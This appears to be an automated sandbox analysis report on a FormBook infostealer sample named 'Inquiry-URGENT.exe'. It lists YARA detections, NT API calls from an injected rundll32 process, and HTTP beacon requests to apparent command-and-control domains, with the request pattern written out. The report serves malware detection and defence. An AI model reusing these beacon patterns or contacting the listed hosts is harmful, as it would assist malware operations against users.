          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libg.png)
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: https://www.novasaude-g1.online/b5ce/?7nqLWRV0=SAwBm0
          Source: unknownDNS traffic detected: queries for: www.lakeefctmich.com
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=/AI3JQDCZyk/6ubsQmnvJO3EeIaIHb6AvonvM2F4xgXAwnTSleK6/XaIEVHpjjtFOEyF&DJE8X=4hlh3 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=wzjkW/L/N1XOH+XSD0678S8O9bVA9y0oVtkfQbp3MHT7u8jt+16wQlgR8fjrLlP4MYPZ&DJE8X=4hlh3 HTTP/1.1Host: www.apexpropertiesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+Axc57SiIQXe&DJE8X=4hlh3 HTTP/1.1Host: www.tameka-stewart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3 HTTP/1.1Host: www.khlopok.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=DJnvNV/6mp+JehKrIaw09sUOMJEcD/JystEz9B9fnmezvaywTqAFSPdXHnxiLUzhPCdJ&DJE8X=4hlh3 HTTP/1.1Host: www.tovardarom.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3 HTTP/1.1Host: www.lianshangtron.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=iJSCg4qWtYnzw4GHWivdfaPpYoJ+2S3Wh/71x72UXIcZgXPac3WPQ9rqQY8gaQxsRQ0f&DJE8X=4hlh3 HTTP/1.1Host: www.nutritionhawks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3 HTTP/1.1Host: www.trasportesemmanuel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: Inquiry-URGENT.exe, Utility.csLong String: Length: 34816
          Source: 2.2.Inquiry-URGENT.exe.710000.0.unpack, Utility.csLong String: Length: 34816
          Source: 2.0.Inquiry-URGENT.exe.710000.0.unpack, Utility.csLong String: Length: 34816
          Source: 3.0.Inquiry-URGENT.exe.5d0000.0.unpack, Utility.csLong String: Length: 34816
          Source: 3.2.Inquiry-URGENT.exe.5d0000.1.unpack, Utility.csLong String: Length: 34816
          Source: Inquiry-URGENT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 2_2_010AF5D0
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 2_2_010AC184
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 2_2_010AE5CA
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 2_2_010AE5D0
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041D098
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041BA9A
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00408C70
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041C496
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041BD4C
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041BF9E
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDD466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE25DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B10D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE2D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE1D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE2EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B36E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDD616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE1FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BEDFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B420A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE20A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE28EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BEE824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE22AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD03DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE2B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BD098
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BBA9A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009A8C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009A2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BBD4C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BBF9E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009A2FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04B1B150 appears 45 times
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_004185B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00418660 NtReadFile,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_004186E0 NtClose,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00418790 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041880A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_004186DA NtClose,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041878A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B85B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B86E0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B8660 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B8790 NtAllocateVirtualMemory,
